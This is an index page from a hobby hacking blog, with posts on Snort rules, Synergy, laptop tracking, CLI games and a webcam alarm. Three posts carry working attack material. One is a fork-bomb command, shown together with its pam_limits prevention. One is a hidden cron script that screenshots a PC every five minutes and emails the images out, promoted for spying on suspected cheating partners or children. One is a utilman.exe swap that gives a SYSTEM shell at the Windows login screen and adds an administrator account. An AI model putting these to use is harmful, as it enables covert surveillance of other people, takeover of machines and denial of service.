Hackosis

Emerging Threats hosts the only open snort rule set.

Emerging Threats is funded by National Science Foundation and the Army Research Office.

You can download the rule sets separately or all at once.

Check out the perl script to automatically update your iptables, Honeywall and Smoothwall configurations, and the inline snort config.

Confused? Read the Emerging Threats documentation site.

What is Snort?

SNORT® is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.

If you use snort and don’t already know about Emerging Threats I am sure it will help you out on your intrusion detecting escapade. If you have any tips for using Emerging Threat’s rules let us know in the comments.

You have multiple computers, and your desk is cluttered with keyboards, mice, and monitors? You desperately need more space, and you are tired of moving your hands the long way from one keyboard to the next? Do not worry any more - rescue is here in form of synergy.

Synergy is a nifty little program which allows you to share your mouse and keyboard with other computers on your network. Just move the mouse out of your screen and it magically appears on the screen of the next computer allowing you to type there. Additionally, you can share cut and paste selections, so you can cut something on one screen/PC, move the mouse to the other screen and paste your selection there . Synergy is available for Windows (XP, NT), GNU/Linux, Mac OS X, and Unix. And the best thing is you can even mix different operating systems. Sounds interesting? So let’s see how it works.

Synergy is composed of a server (synergys) and a client part (synergyc) which communicate with each other over a network to exchange keyboard and mouse events. The server is started on the main PC whose keyboard and mouse should be shared, and the client is started on each machine which should use the input devices of the server. In the configuration file, you define which screen is to the left, right, top, or bottom of each monitor. (like in other multi-monitor setups). If the mouse is moved over an edge, the control events are sent over the network to the host which is defined in the configuration.

Get it

There are binary packages available at the synergy sourceforge page, but if you are using a OS with package management system I recommend checking if it is available there first. Install synergy on every machine which should participate in the input sharing.

Read the rest of this entry …

Infinity Exists features many ‘how to’ videos to quench your inner thirst for exploit information. Topics include lock picking, password cracking, email spoofing, SQL injection, and much more.

What are you waiting for? Go check out the videos!

From Wikipedia:

The fork bomb is a form of denial of service attack against a computer system that implements the fork operation, or equivalent functionality whereby a running process can create another running process. It is considered a wabbit as fork bomb programs typically do not spread as worms or viruses. It relies on the assumption that the number of programs and processes which may be simultaneously executed on a computer has a limit.

Yes, the command “:(){ :|:& };:” looks like a bunch of rabid smileys, but in fact is a dangerous command that could leave your Linux system unusable until rebooted. The command essentially creates a DoS attack on the system by spawning a large number of processes and very quickly taking all available resources and process slots. This is especially important on multiuser systems like terminal servers, web servers, etc.

The jargon file also defines fork bomb.

Linux is not the only vulnerable OS, but lets focus on the bash command structure for now and I will fill you in on ways to prevent your system from being vulnerable from this command and catching users who attempt to start the fork bomb.

:(){
 :|:&
};:

Essentially the code says:

Bomb the bombs while I drop bombs with even more bombs.

But how do I prevent the fork bomb?

Linux has a handy pam_limits module that can limit the amount of resources any one group or user can take. The configuration is stored in the /etc/security/limits.conf file. This will restrict the user or group from spawning more processes than defined in the configuration.

NOTE: This requires that you have the pam_limits module installed.

Example configuration:

user          hard    nproc           300
@group        hard    nproc           300

Replace ‘user’ with usernames and replace ‘@group’ with group names. You might have to play around with the settings and see what works best for your environment and available resources.

OK, but someone is dropping the fork bomb and I can’t tell who it is!

You could simply look in their ~/.bash_history and see, but that isn’t to say they haven’t deleted it out of the file.

The Linux kernel patch grsecurity could be another solution. I don’t have much experience with the patch so I cannot go into great detail, but the grsecurity forum has a bit of information on the issue.

If you have not setup ways to protect your mutliuser system from the fork bomb, it just might leave you dropping the F bomb. We wouldn’t want to hear any system administrator saying that, would we?

Know any other ways to create the fork bomb? Leave a suggestion in the comments.

Have suspicions about what goes on on your own computer when you are away? Think someone might be cheating? Do you often see that the history has been deleted out of the browser? Maybe you just want to keep tabs on what your kids are looking at when you aren’t right there watching.

By using some basic Linux commands and utilities (import, cron, postfix, and mutt) we can spy on any PC we have root access to.

The process is as follows:

1. Cron takes a screen shot of the desktop and saves it to a file using the import command.
2. Cron emails the screenshot to a specified address on a specific interval by using mutt.

The process is quite simple. Just open your terminal follow these steps (tested on Ubuntu, should work on other distros as well):

1. Install postfix, mutt, and imagemagick (for import):
    sudo apt-get install postfix mutt imagemagick
2. Create a message text file with something in it. Doesn’t matter what, just so it doesn’t get caught by the spam filters:
     nano /path/to/message.txt
3. Create a file named ’spy.sh’ (save it somewhere secretive) and add the following lines (fifth and sixth lines are one line). Change emailaccount@domain.com to your email address. Feel free to remove the rm command if you would like to keep the images stored locally (I would recommend moving them out of the /tmp directory tho):
     #!/bin/sh
   NOW=$(date +%Y%m%d%k%M)
   cd /tmp
   import -window root screenshot-$NOW.jpg
   mutt -s “Screenshot for $NOW” -a ./screenshot-$NOW.jpg emailaccount@domain.com < /path/to/message.txt
   rm /tmp/screenshot-$NOW.jpg
4. Now make the spy.sh executable:
     chmod u+x /path/to/spy.sh
5. Run the following (my cron didn’t run without it):
     sudo touch /etc/cron.deny
6. Edit your crontab ‘ sudo crontab -e‘ and enter the following:
    */5 * * * * /path/to/spy.sh

WARNING: This will email you a screen shot every 5 minutes. While this is great for spying beware that your email could fill up pretty quick! Take out some minutes in your crontab to decrease the interval ex, */10 for every 10 minutes or */20 for every 20 minutes.

TIP: If you don’t want the screenshot emailer running while you are on the PC just comment out the line we added with a ‘#’ at the beginning. Don’t forget to change it back before you leave!

TIP: If you aren’t receiving your messages your email server might be rejecting the email because it is originating from a dynamic IP range. In this case, you will need to configure mutt to use your email server instead.

That’s it! You should start receiving screen shots of your desktop in action once the crontab has been hit the first cycle. If you have any problems or questions feel free to leave a comment.

Adeona is open source software to system used to securely and privately track the location of your Windows, Mac, or Linux laptop.

What makes Adeona stand out, even from proprietary solutions, is it’s ability to securely transmit the location data preventing 3rd parties from also gathering the information.

Keep in mind that Adeona is still in beta, so don’t expect a perfect program just yet. Please do report any bugs that you might find.

Installation methods differ between operating systems so be sure to read the download instructions.

One interesting question from the FAQs:

Can I install this on my girlfriend or boyfriend’s computer and track her or him, and perhaps get pictures of them while they’re doing certain activites?

Yes. Like all technologies, Adeona has the potential for being abused. However, if you are malicious enough to want to do the above, there is probably other software available out there more suited for your needs. (We won’t provide links to these more malicious tools.)

Adeona seems to be a good solution to give you a piece of mind that if your laptop gets stolen, you might have a chance to retrieve it.

If you have any other suggestions for software to track your stolen laptop, please let us know in the comments as always.

Have you ever changed or forgotten your Windows password? Fear not because I have the solution for you - and its completely free.

The following method works on Windows XP and Vista.

All you need is a Linux live CD (that auto mounts Windows partitions - ex. Ubuntu, Backtrack, Fedora, openSUSE).

Save the .iso and burn it to a disc.

Boot from the CD and follow these simple instructions - these instructions are assuming your are using backtrack, but should be similar for other Linux distributions:

1. Open a Linux terminal and enter the following commands:
2. cd /mnt
3. ls (Take note of the folders listed here. You might need them in the next step.)
4. cd sda1/Windows/System32/ (If this didn’t work you might have the wrong hard drive, try replacing ’sda1′ with sda2, hda1, or hda2)
5. mv utilman.exe utilman.old && cp cmd.exe utilman.exe
6. reboot (and remove the CD)
7. Once rebooted, at Vista or XP log in screen, Press Windows key + U to run CMD with system privileges. Replace username below with the one of your choice - it must not already exist!
8. c:\>net user username mypassword /add
9. c:\>net localgroup administrators username /add
10. Log in with the new admin account!

After completing don’t forget to copy the utilman.old back to utilman.exe or you will leave your system vulnerable - this is very important!!

I hope this helped in regaining access into your XP or Vista PC and if you know of any other tips like this please let us know in the comments.

UPDATE: Here is a backtrack video tutorial that covers the instructions.

Nothing is better than a 3D game, but when you haven’t installed a GUI and have a quick need to play for a bit, here are 4 text based Linux games for CLI:

1. Bastet - Tetris clone:

Bastet ("bastard tetris") is an ncurses Tetris clone which is harder than every other tetris released. It is based on a heuristics engine which tries to detect which block you need or don’t need, and then gives you the blocks that you don’t need. For instance, if you usually play by leaving long "canyons" one square wide and then waiting for the long "I" block, you’ll have to wait till eternity before you see it. The heuristics have been worked on for some time and are quite nasty.

Install Bastet on Ubuntu:

2. Ninvaders - Space Invaders Clone:

nInvaders project is a Space Invaders clone for ncurses.

Ever wanted to play space invaders when you can’t find a GUI? Now you can!

Install Ninvaders on Ubuntu:

3. Moon-buggy - drive on the moon:

Moon-buggy is a simple character graphics game, where you drive some kind of car across the moon’s surface. Unfortunately there are dangerous craters there. Fortunately your car can jump over them!

Install Moon-buggy on Ubuntu:

4. Greed - a puzzle game:

The strategy game of Greed. Try to eat as much as possible of the board before munching yourself into a corner.

Install Greed on Ubuntu:

Hope you enjoy playing these simple, but fun Linux based CLI games. You can play any of these games by entering “/usr/games/xxxxx” with the Xs being the name of the game.

Do you know of any other fun CLI based games for Linux? Let us know in the comments. [via mellowd.co.uk]

Got to get this t-shirt:

Get your t-shirt here.

Tech.shantanugoel.com writes about how to create a do-it-yourself security system using nothing more than a Linux PC, Webcam, and a Twitter account.

No more brother, Mother, burglar, etc. stepping into your private space or home with out you knowing. Also, don’t forget about enabling Twitter mobile alerts for when a PC might be far from reach.

image via MShades